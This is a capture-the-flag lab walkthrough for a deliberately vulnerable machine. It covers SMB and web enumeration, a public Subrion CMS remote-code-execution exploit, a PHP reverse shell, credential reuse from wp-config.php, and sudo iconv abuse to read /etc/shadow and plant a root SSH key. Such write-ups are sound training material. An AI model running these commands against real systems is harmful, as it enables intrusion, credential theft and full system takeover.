# Tech\_Supp0rt: 1

## Nmap

```
nmap 10.10.195.72 -p- -sS -sV

PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp  filtered domain
80/tcp  open     http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

First off we check `SMB` for null access and find the share *websrv* which is readable by anyone.

```
smbmap -H '10.10.195.72' -u '' -p '' -R
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvvaTsTwYfFOC1COtvEdD%2Fimage.png?alt=media\&token=8af86fc0-edec-4043-ae18-10c0e50da8af)

the file `enter.txt` is of interest, we then download it using `smbmap`.

```
smbmap -H '10.10.195.72' -u '' -p '' -R -A 'enter.txt'
```

Reading the contents of `enter.txt` we find this is a to-do list. We can make a note of the information.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxIrprrcIHDnYTtRshaZZ%2Fimage.png?alt=media\&token=68da6c04-f7c8-4a29-b1ff-15edf4f6d8e7)

The default page on port 80 comes to the default `Apache 2` web page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FTmppoY6y6B93Gr8vSCPO%2Fimage.png?alt=media\&token=c89556a2-cdea-4d09-abad-ad3f6ad6fa57)

Running `feroxbuster` against the target system we discover a few interesting results.

```
feroxbuster -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/common.txt -s 200 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FittYTlbEvttQf39J7rzW%2Fimage.png?alt=media\&token=e96f3669-939e-44b2-b70c-73de79b60e95)

Under `/test/index.html` we find a fake scam web page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDFaoIpXPskajEYrQTkbC%2Fimage.png?alt=media\&token=1322a38c-d010-4e85-aa3e-fb747ab148e8)

We also find WordPress is installed under `/wordpress/`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2AT2Potj3j8vrlHhYurA%2Fimage.png?alt=media\&token=f0ddad15-dc52-4571-b056-44844ecbdfef)

I enumerate the `Wordpress` site and tried to identify vulnerable plugins with `WPScan` and was unable to find any vulnerabilities.

Looking back at the information in the `enter.txt` file we are reminded of the presence of `Subrion` which is a CMS system.

Attempting to browse to `/subrion` redirects us incorrectly. The enter.txt file mentions fixing the issue by using the "panel". A quick Google search shows this normally exists under the directory name /panel.

Browsing to `http://<IP>/subrion/panel/` proves successful.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FzgCFlLuChLxEnMOb9xPe%2Fimage.png?alt=media\&token=e16c4563-056e-4a8c-b160-64dc080f1bb1)

However, we are unable to login to the system. Looking at the admin credentials earlier in `enter.txt` we see the remark "Cooked with magic formula".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9tGzUuRXqQ7esvz8neX9%2Fimage.png?alt=media\&token=68a4277a-0c68-4e7a-9be2-dbcd8cc36211)

Taking the hash value and running it through CyberChef's "Magic" options reveals the plain text password for the value.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FkCBYNer3BUvQkNzWL4oF%2Fimage.png?alt=media\&token=26f86d13-da1d-48fd-b1ec-0aacc35efada)

We are then able to login successfully to the Subrion panel.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCoDKIQnCUmeeOoxdx6kH%2Fimage.png?alt=media\&token=94f25681-062c-427b-a34d-0655febe584f)

Researching vulnerabilities for Subrion 4.2.1 on Google we find the following CVE and exploit on Github.

**CVE:** <https://nvd.nist.gov/vuln/detail/CVE-2018-19422>

**Description**

/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.

**Github:** <https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE>

As per the the Github repository we run the exploit with the following syntax:

```bash
python3 exploit.py -u 'http://10.10.26.125/subrion/panel/' -l 'admin'  -p <Password>
```

Where we receive a shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDNU977ZiIleOWrsXHZjK%2Fimage.png?alt=media\&token=ccf6bb0b-3ba2-4c35-bb5b-b9bc1f0d3082)

Unfortunately, for various reasons this shell is not ideal for what we need. As such I uploaded a PHP reverse shell and set up a `netcat` listener on my attacking system.

I was then able to catch a more reliable shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdUrIkAsINPgrcYjF3zSG%2Fimage.png?alt=media\&token=0f448b7a-b51e-4e3b-96e9-225e7c0a8616)

Next, upgrade to a TTY shell.

{% content-ref url="../../../everything/everything-linux/shell-upgrades" %}
[shell-upgrades](https://viperone.gitbook.io/pentest-everything/everything/everything-linux/shell-upgrades)
{% endcontent-ref %}

Enumerating the WordPress install we find some credentials in `wp-config.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3eZfyDFIcnCcKXRK0nQQ%2Fimage.png?alt=media\&token=be272476-6d22-4016-97de-a4bcb06d7f38)

Looking at `/etc/passwd` we see the user *scamsite* exists on the system. We are then able to switch over to the user with the found credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F5l5HnvHkVJt4sucqLKIj%2Fimage.png?alt=media\&token=effb9704-0d16-43f3-ac1c-470f6edae468)

Checking the **sudo** permissions for *scamsite* we see the user is able to run `/usr/bin/iconv` as root without specifying a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FoBOU6xaJYUbAF7tFEBhR%2Fimage.png?alt=media\&token=8173dba4-c239-4e7e-ace1-ee1454176fb9)

Viewing GTFOBins we see this binary can be used to perform privileged read and writes to the system.

**GTFOBins:** <https://gtfobins.github.io/gtfobins/iconv/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwhPjjFT5qLRAdmOCk2Hm%2Fimage.png?alt=media\&token=1042c8fa-6d6a-418d-8518-1356f5cb38c6)

We can go for an easy flag grab

```bash
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 /etc/shadow
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FF8K2rT0rRiWoU4poRTNz%2Fimage.png?alt=media\&token=0ebd58df-50a5-4f94-897c-a6cfbf390d3c)

Alternatively we can grab a root `SSH` shell.

```
# Generate SSH key files on attacking system
ssh-keygen
# Keep hitting enter to generate a new /.ssh/id_rsa.pub
```

On the target system copy the contents of `/.ssh/id_rsa.pub` into the command below to create the authorized keys files in the `/root/.ssh/` directory.

```
echo 'ssh-rsa AAAAB3NzaC1yAAADAQABAAABgQDnSqBG0mN7Ceqvr44mZHi4viNBtJKvCU2rOkhgwhhYDdExldniqHY4VIfQWnVlczB8WLSZjgtGJIbDf7IXXbBwTs42asHqz/aum0Oyz7AzZEi57cdTybj+6qFYiv6Znd2IxO9t0IsEjitzG9WoFoI52neyz4XoZwGZO1lsiBJNuy8hwMfB5aHI8xAaiRpTmDa/+G+lQN5yEBoSO8EUK8J4CeD2aO2WoAw8CHqy2zjYEHny1oIa4pjHVXsstv+GcScKWBcoT2pG/hRK9KZSs/pD3eOOypztMONOzlt2lfd5Eg5zNzlq+qbzzdA00XUtdfb2EV5oK3v4mKbEHT2HCKgtvzVQaLo4WCyNU2MiQ1Ia+MZjVwkdbr9lUKka3QSM1fBF7ozucmxvjzx2jd7b7gNf4B9qOJYYfQGc2gkS1ryldrWDEniGuEqI7jUqpG3uzVycTRqC0l+XROhW9VKUoUe5VSNyqVVXmWZzQ46ajLoWl4ZklBgnbL0CPU= kali@kali' | sudo /usr/bin/iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys
```

Then login to the target system as root without needing to specify a password.

```bash
ssh root@<IP>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fj8MPKJJ7JC3DsvckuFEV%2Fimage.png?alt=media\&token=97273079-3a07-4151-a2fe-418478fe58c4)